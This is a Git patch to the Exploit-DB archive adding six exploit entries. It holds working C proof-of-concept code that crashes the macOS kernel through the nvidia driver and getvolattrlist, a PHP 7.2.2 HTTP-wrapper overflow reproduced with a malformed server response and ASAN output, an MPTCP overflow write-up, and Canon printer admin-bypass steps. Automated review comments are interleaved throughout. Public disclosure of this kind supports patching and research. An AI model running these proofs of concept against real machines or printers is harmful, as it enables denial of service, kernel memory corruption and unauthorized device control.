From 0909e63d9ec8ae420862c4bd86ffd820a8998b79 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 7 Jun 2018 05:01:47 +0000 Subject: [PATCH] DB: 2018-06-07 6 changes to exploits/shellcodes PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authentication Bypass Canon MF210/MF220 - Authentication Bypass --- exploits/hardware/webapps/44844.txt | 184 ++++++++++++++++ exploits/hardware/webapps/44845.txt | 323 ++++++++++++++++++++++++++++ exploits/macos/dos/44847.c | 147 +++++++++++++ exploits/multiple/dos/44848.c | 105 +++++++++ exploits/multiple/dos/44849.txt | 78 +++++++ exploits/php/dos/44846.txt | 108 ++++++++++ files_exploits.csv | 6 + 7 files changed, 951 insertions(+) create mode 100644 exploits/hardware/webapps/44844.txt create mode 100644 exploits/hardware/webapps/44845.txt create mode 100644 exploits/macos/dos/44847.c create mode 100644 exploits/multiple/dos/44848.c create mode 100644 exploits/multiple/dos/44849.txt create mode 100644 exploits/php/dos/44846.txt diff --git a/exploits/hardware/webapps/44844.txt b/exploits/hardware/webapps/44844.txt new file mode 100644 index 000000000..323724488 --- /dev/null +++ b/exploits/hardware/webapps/44844.txt 
@@ -0,0 +1,184 @@ +# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C] +# Date: [3.6.2018] +# Exploit Author: [Huy Kha] +# Vendor Homepage: [http://global.canon.com] +# Software Link: [ Website ] +# Severity: High +# Version: LBP6650, LBP3370, LBP3460, LBP7750C +# Tested on: Mozilla FireFox + +# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers. +It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication. + + + +# PoC : +Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers. +You can recognize them with the /tlogin.cgi parameter, but the version is +also been displayed on the webinterface. +https://imgur.com/a/QE3GfLw + +# Example : + +1. Go to the following url: http://127.0.0.1/tlogin.cgi +2. Click on Administrator Mode +3. Intercept now the request with Burpsuite and click on 'Ok'' to login. +And forward the request till you get the ''/frame.cgi?page=DevStatus'' +parameter. + + +# Request : + +GET /frame.cgi?page=DevStatus HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/tlogin.cgi +Cookie: CookieID=1610705327:; Login=11 +Connection: close +Upgrade-Insecure-Requests: 1 + +# Response : + +HTTP/1.1 200 OK +Date: MON, 05 JAN 1970 16:35:57 GMT +Server: CANON HTTP Server +Content-Type: text/html +Content-Length: 5652 + + + + + + + + + + + + + + + + + + + + +<body> +</body> + + + + + + +# Do we have now access to the printer with Admin Mode? : Yes + +# How to fix this? : Remove the default password and add a new (strong) password. + + +# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode) \ No newline at end of file 
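Review bot: the impact and the fix stated in this hunk contradict each other. The description says a remote unauthenticated attacker can bypass Administrator Mode "at any URL of the device that requires authentication", but "How to fix this?" answers "Remove the default password and add a new (strong) password", which describes a default-credential weakness, not an access-control flaw. The advisory should state whether the tested units still had the factory password set, and it should include the intercepted login request that Burp forwards, because the single `GET /frame.cgi?page=DevStatus` with `Cookie: CookieID=1610705327:; Login=11` shown here does not by itself demonstrate that the password check was skipped. Smaller points: the template placeholders (`Software Link: [ Website ]`, the square brackets around the title, date and author) were left unfilled, and `Version:` lists printer models rather than a firmware version, so readers cannot tell which firmware builds are affected.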
diff --git a/exploits/hardware/webapps/44845.txt b/exploits/hardware/webapps/44845.txt new file mode 100644 index 000000000..8876ca087 --- /dev/null +++ b/exploits/hardware/webapps/44845.txt 
@@ -0,0 +1,323 @@ +# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ] +# Date: [4.6.2018] +# Exploit Author: [Huy Kha] +# Vendor Homepage: [http://global.canon.com] +# Software Link: [ Website ] +# Version: MF210 & MF20 Series +# Severity: High +# Tested on: Mozilla FireFox +# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface. +It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication. + + + +# PoC : +Start searching for Canon MF210 & MF220 printers. +You can recognize them with the /login.html parameter, but the version is +also been displayed on the webinterface. +https://imgur.com/a/5ON4HF6 + +# Example : + +1. Go to the following url: http://127.0.0.1/login.html +2. Click on System Manager Mode +3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter. + + +# Request : + +GET /portal_top.html HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 +Firefox/52.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://129.2.52.116/login.html +Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC +Connection: close +Upgrade-Insecure-Requests: 1 + +# Response : + +HTTP/1.1 200 OK +Expires: Thu, 1 Jan 1998 00:00:00 GMT +Content-Type: text/html +Content-Length: 6119 +Pragma: no-cache +Cache-Control: no-store, no-cache, max-age=0 +Connection: close +Set-Cookie: +fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly + + + + + + + + + + + + + + + + + + +Remote UI: Portal: MF220 Series: MF220 Series + + +
+
+
+
+

+ + + + + +

+
+ + ++++ + + + + + + + + + + + + + + +
Device Name:MF220 Series
Product Name:MF220 Series
Location:
+
+
+
+
+ +

Log Out

+
+
+
+
+
+
+
+
+

Remote UI: Portal

+ +
+
+
+
+
+
+
+
+

Device Info

+
+
Last Updated:06/04/2018 04:27 AM
+
+ +
+
+
+
+

Contents

+
+

+
+
+

Device Basic Information

+
+
Device Status
+ ++++ + + + + + + + + + + + + + + + + +
Printer: +Sleep mode. +
Scanner: +Sleep mode. +
Fax: +Ready to send or receive faxes. +
+
+
+
Error Information
+

No errors.

+ +
+
+
+

Consumables Information

+
+ +
Paper Information
+ ++++++ + + + + + + + + + + + + + + + + + + + + + + + + + + +
Paper SourcePaper LevelPaper SizePaper Type
Multi-Purpose TrayNoneLTRPlain (16 lb Bond-23 lb Bond)
Drawer 1OKLTRPlain (16 lb Bond-23 lb Bond)
+
+
+
Cartridge Information
+ ++++ + + + + + + + + + + + + +
ColorLevel
Black60%
+
+
+
+

Support Link

+
+ ++++ + + + + + + + + +
Support Link:
+
+
+
+
+
+
+
+ +
+
+
+
+
+
Copyright CANON INC. 2014
+
+
+ + + + + + +# Do we have now access to the printer with System Manager Mode? : Yes + +# Screenshot : https://imgur.com/a/U6oBYNV + +# How to fix this? : Remove the default password and add a new (strong) password. \ No newline at end of file diff --git a/exploits/macos/dos/44847.c b/exploits/macos/dos/44847.c new file mode 100644 index 000000000..1bea54a1c --- /dev/null +++ b/exploits/macos/dos/44847.c 
@@ -0,0 +1,147 @@ +/* +nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService. + +It calls task_deallocate without locking. Two threads can race calling this external method to drop +two task references when only one is held. + +Note that the repro forks a child which give the nvAccelerator a different task otherwise +the repro is more likely to leak task references than panic. +*/ + +// ianbeer + +#if 0 +MacOS kernel UAF due to lack of locking in nvidia GeForce driver + +nvDevice::SetAppSupportBits is external method 0x107 of the nvAccelerator IOService. + +It calls task_deallocate without locking. Two threads can race calling this external method to drop +two task references when only one is held. + +Note that the repro forks a child which give the nvAccelerator a different task otherwise +the repro is more likely to leak task references than panic. +#endif + +// build: clang -o nvtask nvtask.c -framework IOKit +// run: while true; do ./nvtask; done + +#include +#include +#include +#include +#include +#include + +#include + +#include +#include + +#include + +uint64_t set_app_support_bits(mach_port_t conn) { + kern_return_t err; + + uint64_t inputScalar[16]; + uint64_t inputScalarCnt = 0; + + char inputStruct[4096]; + size_t inputStructCnt = 0; + + uint64_t outputScalar[16]; + uint32_t outputScalarCnt = 0; + + char outputStruct[4096]; + size_t outputStructCnt = 0; + + inputStructCnt = 1; + outputStructCnt = 1; + + inputStruct[0] = 0xff; + + err = IOConnectCallMethod( + conn, + 0x107, + inputScalar, + inputScalarCnt, + inputStruct, + inputStructCnt, + outputScalar, + &outputScalarCnt, + outputStruct, + &outputStructCnt); + + if (err != KERN_SUCCESS){ + printf("IOConnectCall error: %x\n", err); + } else{ + printf("worked?\n"); + } + + return 0; +} + + +volatile int go = 0; +volatile int running = 0; +void* thread_func(void* arg) { + mach_port_t conn = (mach_port_t)arg; + printf("thread running\n"); + running = 1; + while(!go){;} + 
set_app_support_bits(conn); + return 0; +} + +int main(int argc, char** argv){ + pid_t child_pid = fork(); + if (child_pid == -1) { + printf("fork failed\n"); + return 0; + } + if (child_pid) { + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator")); + if (service == MACH_PORT_NULL) { + printf("unable to find service\n"); + return 0; + } + printf("got service: 0x%x\n", service); + + io_connect_t conn = MACH_PORT_NULL; + kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice + if (err != KERN_SUCCESS) { + printf("unable to open ioservice\n"); + return 0; + } + printf("got service\n"); + pthread_t th; + pthread_create(&th, NULL, thread_func, (void*)conn); + + while(!running){;} + go = 1; + set_app_support_bits(conn); + + pthread_join(th, NULL); + + int loc = 0; + wait(&loc); + } else { + io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("nvAccelerator")); + if (service == MACH_PORT_NULL) { + printf("unable to find service\n"); + return 0; + } + printf("got service: 0x%x\n", service); + + io_connect_t conn = MACH_PORT_NULL; + kern_return_t err = IOServiceOpen(service, mach_task_self(), 5, &conn); // nvDevice + if (err != KERN_SUCCESS) { + printf("unable to open ioservice\n"); + return 0; + } + printf("got service\n"); + set_app_support_bits(conn); + + } + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/dos/44848.c b/exploits/multiple/dos/44848.c new file mode 100644 index 000000000..9cd8e031a --- /dev/null +++ b/exploits/multiple/dos/44848.c 
@@ -0,0 +1,105 @@ +/* +getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. + +When allocating a kernel buffer to serialize the attr list to there's the following comment: + + /* + * Allocate a target buffer for attribute results. + * Note that since we won't ever copy out more than the caller requested, + * we never need to allocate more than they offer. + */ + ab.allocated = ulmin(bufferSize, fixedsize + varsize); + if (ab.allocated > ATTR_MAX_BUFFER) { + error = ENOMEM; + VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); + goto out; + } + MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); + +The problem is that the code doesn't then correctly handle the case when the user supplied buffer size +is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: + + /* Return attribute set output if requested. */ + if (return_valid) { + ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; + if (pack_invalid) { + /* Only report the attributes that are valid */ + ab.actual.commonattr &= ab.valid.commonattr; + ab.actual.volattr &= ab.valid.volattr; + } + bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); + } + +There's no check that the allocated buffer is big enough to hold at least that. + +Tested on MacOS 10.13.4 (17E199) +*/ + +// ianbeer +#if 0 +MacOS/iOS kernel heap overflow due to lack of lower size check in getvolattrlist + +getvolattrlist takes a user controlled bufferSize argument via the fgetattrlist syscall. + +When allocating a kernel buffer to serialize the attr list to there's the following comment: + + /* + * Allocate a target buffer for attribute results. + * Note that since we won't ever copy out more than the caller requested, + * we never need to allocate more than they offer. 
+ */ + ab.allocated = ulmin(bufferSize, fixedsize + varsize); + if (ab.allocated > ATTR_MAX_BUFFER) { + error = ENOMEM; + VFS_DEBUG(ctx, vp, "ATTRLIST - ERROR: buffer size too large (%d limit %d)", ab.allocated, ATTR_MAX_BUFFER); + goto out; + } + MALLOC(ab.base, char *, ab.allocated, M_TEMP, M_ZERO | M_WAITOK); + +The problem is that the code doesn't then correctly handle the case when the user supplied buffer size +is smaller that the requested header size. If we pass ATTR_CMN_RETURNED_ATTRS we'll hit the following code: + + /* Return attribute set output if requested. */ + if (return_valid) { + ab.actual.commonattr |= ATTR_CMN_RETURNED_ATTRS; + if (pack_invalid) { + /* Only report the attributes that are valid */ + ab.actual.commonattr &= ab.valid.commonattr; + ab.actual.volattr &= ab.valid.volattr; + } + bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual)); + } + +There's no check that the allocated buffer is big enough to hold at least that. + +Tested on MacOS 10.13.4 (17E199) + +#endif + +#include +#include +#include +#include +#include + +int main() { + int fd = open("/", O_RDONLY); + if (fd == -1) { + perror("unable to open fs root\n"); + return 0; + } + + struct attrlist al = {0}; + + al.bitmapcount = ATTR_BIT_MAP_COUNT; + al.volattr = 0xfff; + al.commonattr = ATTR_CMN_RETURNED_ATTRS; + + size_t attrBufSize = 16; + void* attrBuf = malloc(attrBufSize); + int options = 0; + + int err = fgetattrlist(fd, &al, attrBuf, attrBufSize, options); + printf("err: %d\n", err); + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/dos/44849.txt b/exploits/multiple/dos/44849.txt new file mode 100644 index 000000000..98bcb3de4 --- /dev/null +++ b/exploits/multiple/dos/44849.txt 
@@ -0,0 +1,78 @@ +mptcp_usr_connectx is the handler for the connectx syscall for the AP_MULTIPATH socket family. + +The logic of this function fails to correctly handle source and destination sockaddrs which aren't +AF_INET or AF_INET6: + +// verify sa_len for AF_INET: + + if (dst->sa_family == AF_INET && + dst->sa_len != sizeof(mpte->__mpte_dst_v4)) { + mptcplog((LOG_ERR, "%s IPv4 dst len %u\n", __func__, + dst->sa_len), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + error = EINVAL; + goto out; + } + +// verify sa_len for AF_INET6: + + if (dst->sa_family == AF_INET6 && + dst->sa_len != sizeof(mpte->__mpte_dst_v6)) { + mptcplog((LOG_ERR, "%s IPv6 dst len %u\n", __func__, + dst->sa_len), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + error = EINVAL; + goto out; + } + +// code doesn't bail if sa_family was neither AF_INET nor AF_INET6 + + if (!(mpte->mpte_flags & MPTE_SVCTYPE_CHECKED)) { + if (mptcp_entitlement_check(mp_so) < 0) { + error = EPERM; + goto out; + } + + mpte->mpte_flags |= MPTE_SVCTYPE_CHECKED; + } + +// memcpy with sa_len up to 255: + + if ((mp_so->so_state & (SS_ISCONNECTED|SS_ISCONNECTING)) == 0) { + memcpy(&mpte->mpte_dst, dst, dst->sa_len); + } + +This PoC triggers the issue to overwrite the mpte_itfinfo field leading to a controlled pointer +being passed to kfree when the socket is closed. + +Please note that these lengths seem to be trusted in multiple places - I would strongly suggest auditing +this code quite thoroughly, especially as mptcp can be reached from more places as of iOS 11. 
+ +Note that the MPTCP code does seem to be quite buggy; trying to get a nice PoC working for this buffer overflow +bug I accidentally triggered the following error path: + + error = socreate_internal(dom, so, SOCK_STREAM, IPPROTO_TCP, p, + SOCF_ASYNC, PROC_NULL); + mpte_lock(mpte); + if (error) { + mptcplog((LOG_ERR, "%s: subflow socreate mp_so 0x%llx unable to create subflow socket error %d\n", + (u_int64_t)VM_KERNEL_ADDRPERM(mp_so), error), + MPTCP_SOCKET_DBG, MPTCP_LOGLVL_ERR); + + proc_rele(p); + + mptcp_subflow_free(mpts); + return (error); + } + +note that first argument to mptcplog has one too few arguments. It's probably not so interesting from a security +POV but is indicative of untested code (this error path has clearly never run as it will always kernel panic.) + +This PoC is for MacOS but note that this code is reachable on iOS 11 from inside the app sandbox if you give yourself +the multipath entitlement (which app store apps can now use.) + +Just run this PoC as root on MacOS for easy repro. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44849.zip \ No newline at end of file diff --git a/exploits/php/dos/44846.txt b/exploits/php/dos/44846.txt new file mode 100644 index 000000000..b5a8658d5 --- /dev/null +++ b/exploits/php/dos/44846.txt 
@@ -0,0 +1,108 @@ +Description: +------------ +The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at: + +php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 + + if (tmp_line[tmp_line_len - 1] == '\n') { + --tmp_line_len; + if (tmp_line[tmp_line_len - 1] == '\r') { + --tmp_line_len; + } +} + +If the proceeding buffer contains '\r' as either controlled content or junk on stack, under a realistic setting (non-ASAN), tmp_line_len could go do -1, resulting in an extra large string being copied subsequently. Under ASAN a segfault can be observed. + +$ bin/php --version +PHP 7.2.2 (cli) (built: Feb 20 2018 08:51:24) ( NTS ) +Copyright (c) 1997-2018 The PHP Group +Zend Engine v3.2.0, Copyright (c) 1998-2018 Zend Technologies + + +Test script: +--------------- +$ xxd -g 1 poc +0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100.. + +$ nc -vvlp 8080 < poc +Listening on [0.0.0.0] (family 0, port 8080) +Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) +GET / HTTP/1.0 +Host: localhost:8080 +Connection: close + +$ bin/php -r 'file_get_contents("http://localhost:8080");' + +Expected result: +---------------- +NO CRASH + +Actual result: +-------------- +$ bin/php -r 'file_get_contents("http://localhost:8080");' +================================================================= +==26249== ERROR: AddressSanitizer: stack-buffer-overflow on address 0xbfc038ef at pc 0x8aa393b bp 0xbfc02eb8 sp 0xbfc02eac +READ of size 1 at 0xbfc038ef thread T0 + #0 0x8aa393a in php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 + #1 0x8aa61fb in php_stream_url_wrap_http /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:979 + #2 0x8b8b115 in _php_stream_open_wrapper_ex /home/weilei/php-7.2.2/main/streams/streams.c:2027 + #3 0x8918dc0 in zif_file_get_contents /home/weilei/php-7.2.2/ext/standard/file.c:550 
+ #4 0x867993a in phar_file_get_contents /home/weilei/php-7.2.2/ext/phar/func_interceptors.c:224 + #5 0x91ee267 in ZEND_DO_ICALL_SPEC_RETVAL_UNUSED_HANDLER /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:573 + #6 0x91ee267 in execute_ex /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:59731 + #7 0x923c13c in zend_execute /home/weilei/php-7.2.2/Zend/zend_vm_execute.h:63760 + #8 0x8cba975 in zend_eval_stringl /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1082 + #9 0x8cbaf66 in zend_eval_stringl_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1123 + #10 0x8cbb06b in zend_eval_string_ex /home/weilei/php-7.2.2/Zend/zend_execute_API.c:1134 + #11 0x9244455 in do_cli /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1042 + #12 0x9246b37 in main /home/weilei/php-7.2.2/sapi/cli/php_cli.c:1404 + #13 0xb5e8ca82 (/lib/i386-linux-gnu/libc.so.6+0x19a82) + #14 0x80656d0 in _start (/home/weilei/php7_asan/bin/php+0x80656d0) +Address 0xbfc038ef is located at offset 607 in frame of T0's stack: + This frame has 13 object(s): + [32, 36) 'transport_string' + [96, 100) 'errstr' + [160, 164) 'http_header_line_length' + [224, 232) 'timeout' + [288, 296) 'req_buf' + [352, 360) 'tmpstr' + [416, 432) 'ssl_proxy_peer_name' + [480, 496) 'http_header' + [544, 576) 'buf' + [608, 736) 'tmp_line' + [768, 1792) 'location' + [1824, 2848) 'new_path' + [2880, 3904) 'loc_path' +HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext + (longjmp and C++ exceptions *are* supported) +SUMMARY: AddressSanitizer: stack-buffer-overflow /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723 php_stream_url_wrap_http_ex +Shadow bytes around the buggy address: + 0x37f806c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f806d0: 00 00 f1 f1 f1 f1 04 f4 f4 f4 f2 f2 f2 f2 04 f4 + 0x37f806e0: f4 f4 f2 f2 f2 f2 04 f4 f4 f4 f2 f2 f2 f2 00 f4 + 0x37f806f0: f4 f4 f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 f4 + 0x37f80700: f4 f4 f2 f2 f2 f2 00 00 f4 f4 f2 f2 f2 f2 00 00 
+=>0x37f80710: f4 f4 f2 f2 f2 f2 00 00 00 00 f2 f2 f2[f2]00 00 + 0x37f80720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f2 f2 + 0x37f80730: f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 + 0x37f80760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap righ redzone: fb + Freed Heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + ASan internal: fe +==26249== ABORTING +Aborted \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f1e03f75a..343b49a8c 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5987,6 +5987,10 @@ id,file,description,date,author,type,platform,port 44817,exploits/windows/dos/44817.js,"Microsoft Edge Chakra - EntrySimpleObjectSlotGetter Type Confusion",2018-05-31,"Google Security Research",dos,windows, 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple, 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux, +44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php, +44847,exploits/macos/dos/44847.c,"macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos, +44848,exploits/multiple/dos/44848.c,"macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple, +44849,exploits/multiple/dos/44849.txt,"XNU Kernel - Heap Overflow Due to Bad Bounds Checking in MPTCP",2018-06-06,"Google Security Research",dos,multiple, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 
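Review bot: the 44846 row credits "Wei Lei and Liu Yang" and dates the entry 2018-06-06, but the 44846.txt file added in this patch carries no author, date, CVE or version header of its own (the only version evidence is the `bin/php --version` output, and the only author hint is the `/home/weilei/` build path); the csv should not be the sole record of that metadata, so the advisory text ought to be given the same header block the other files in this commit use.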
@@ -39507,3 +39511,5 @@ id,file,description,date,author,type,platform,port 44837,exploits/php/webapps/44837.py,"Pagekit < 1.0.13 - Cross-Site Scripting Code Generator",2018-06-05,DEEPIN2,webapps,php, 44839,exploits/hardware/webapps/44839.md,"Brother HL Series Printers 1.15 - Cross-Site Scripting",2018-06-04,"Huy Kha",webapps,hardware, 44843,exploits/linux/webapps/44843.py,"Jenkins Mailer Plugin < 1.20 - Cross-Site Request Forgery (Send Email)",2018-06-05,Kl3_GMjq6,webapps,linux, +44844,exploits/hardware/webapps/44844.txt,"Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware, +44845,exploits/hardware/webapps/44845.txt,"Canon MF210/MF220 - Authenticaton Bypass",2018-06-06,"Huy Kha",webapps,hardware,
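Review bot: for the 44845.txt hunk, the `Version:` field reads "MF210 & MF20 Series" where the title and description say MF220. The `Referer: http://129.2.52.116/login.html` header does not match `Host: 127.0.0.1` and looks like an address left un-redacted from the original capture; it should be 127.0.0.1 like the rest of the request. The response section pastes the whole portal page body (device status, paper and cartridge tables, support link, footer) after the headers, which adds nothing to the finding; trimming it to the status line, headers and the "Remote UI: Portal" title would make the advisory readable. The same contradiction as in 44844.txt applies: a bypass "without a PIN at any URL of the device that requires authentication" is not fixed by "Remove the default password and add a new (strong) password"; the advisory should say whether a System Manager PIN had actually been set on the tested device.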
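Review bot: for the 44847.c hunk, the leading `/* ... */` comment and the `#if 0 ... #endif` block carry the same text word for word; keep one (the `#if 0` copy, which also has the title line). The `#include` directives appear with no header names in this rendering; confirm that the committed file names the IOKit, pthread, unistd and sys/wait headers that `IOServiceGetMatchingService`, `pthread_create`, `fork` and `wait` need, otherwise the stated build line `clang -o nvtask nvtask.c -framework IOKit` cannot succeed. `set_app_support_bits` is declared `uint64_t` but always returns 0 and neither caller uses the result; returning the `kern_return_t` from `IOConnectCallMethod` would let `main` tell a completed call from an `IOConnectCall error`. The service lookup and `IOServiceOpen(service, mach_task_self(), 5, &conn)` sequence is duplicated verbatim in the parent and child branches of `main`; one helper returning the `io_connect_t` removes the copy.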
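Review bot: for the 44848.c hunk, the header comment is duplicated in a `#if 0` block exactly as in 44847.c; keep one copy and correct "smaller that the requested header size" to "smaller than". In `main`, `perror("unable to open fs root\n")` places the newline before the `: strerror` text that `perror` appends, so the `\n` should go; the `malloc(attrBufSize)` result is unchecked and neither the descriptor nor the buffer is released, acceptable for a one-shot crasher but worth a comment. The comment quotes `ab.allocated = ulmin(bufferSize, fixedsize + varsize)` and the unconditional `bcopy(&ab.actual, ab.base + sizeof(uint32_t), sizeof (ab.actual))`; spelling out that the buffer must hold at least `sizeof(uint32_t) + sizeof(ab.actual)` bytes, and that the chosen `attrBufSize = 16` is below that, would make the trigger condition explicit instead of leaving the reader to work it out.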
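Review bot: for the 44849.txt hunk, the text describes a PoC ("This PoC triggers the issue to overwrite the mpte_itfinfo field") but the file contains no code, only the bin-sploits zip link at the very end; say up front that the source is in the linked archive. "AP_MULTIPATH" in the first line should read `AF_MULTIPATH`, consistent with the `AF_INET`/`AF_INET6` names used in the quoted code. The claim that the `mptcplog` call has one argument too few is checkable from the quoted lines and should be stated that way: the format string has three specifiers (`%s`, `0x%llx`, `%d`) but only `(u_int64_t)VM_KERNEL_ADDRPERM(mp_so), error` follow it. The remediation is only implied by the commentary; stating that `mptcp_usr_connectx` must reject a `dst->sa_family` that is neither `AF_INET` nor `AF_INET6` before reaching `memcpy(&mpte->mpte_dst, dst, dst->sa_len)` would give the kernel-side reviewer a concrete check to look for.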
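Review bot: for the 44846.txt hunk, the description has "proceeding buffer" for "preceding buffer" and "could go do -1" for "could go to -1", and the closing brace of the quoted `if (tmp_line[tmp_line_len - 1] == '\n')` block is outdented relative to its opening `if`. The pasted ASAN report supports the description more precisely than the prose does: the READ of size 1 is at offset 607 while `tmp_line` occupies [608, 736), so the bad access is one byte before the array, i.e. `tmp_line[-1]`, which is what the inner `'\r'` check reads once a line consisting only of `\n` has brought `tmp_line_len` to 0. Stating that, together with the evident fix of guarding both decrements with a `tmp_line_len > 0` check, would turn the crash dump into an explanation. The shadow-byte dump and legend after the `SUMMARY:` line add nothing to the report and could be cut.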
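Review bot: both rows added in this csv hunk spell the description "Authenticaton Bypass"; it should be "Authentication Bypass", and because the commit subject is generated from these descriptions the typo propagates there as well.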